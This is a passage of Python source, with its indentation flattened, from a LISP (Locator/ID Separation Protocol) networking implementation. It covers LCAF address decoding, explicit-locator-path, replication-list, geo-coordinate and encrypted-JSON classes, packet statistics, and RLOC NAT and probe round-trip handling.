# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
        # Get AFI and source address. Validate that there is enough length
        # and there are bytes left in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
        # Get AFI and group address. Validate that there is enough length
        # and there are bytes left in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
        # If we did not find a match, this is possibly an ITR. We need to use
        # the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
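    #
    # As an illustrative example, parse_geo_string("37-23-17-N-121-55-34-W/50")
    # stores latitude 37 degrees 23 minutes 17 seconds North, longitude 121
    # degrees 55 minutes 34 seconds West, with radius 50 (compared against
    # kilometers in point_in_circle() below).
    #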
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
        # Decide to encrypt or decrypt. The map-server encrypts and stores
        # ciphertext in the mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
        # If the LISP site-eid is not configured to encrypt the JSON, then
        # store it in plaintext.
#
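        # As an illustrative example (hypothetical key value), a lig user
        # could set:
        #
        #   export LISP_JSON_KEY="[1]my-json-key"
        #
        # which selects key-id 1 and key "my-json-key" for decryption.
        #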
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Any time a new
# lisp_packet().packet_error value is added, the corresponding key string
# needs to be added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This is a locator record definition as defined in the LISP RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
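#
# Worked example (assuming LISP_RLOC_PROBE_TTL is 64): a probe arriving
# with a remaining TTL of 61 is recorded as 3 hops; a remaining TTL
# below half the original prints "!" and a to-hops value of 0 prints "?".
#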
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
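#
# The telemetry JSON carries itr-out, etr-in, etr-out, and itr-in
# timestamps; fl is the forward-path (ITR->ETR) latency and rl the
# return-path (ETR->ITR) latency, each rounded to 3 decimal places.
#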
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
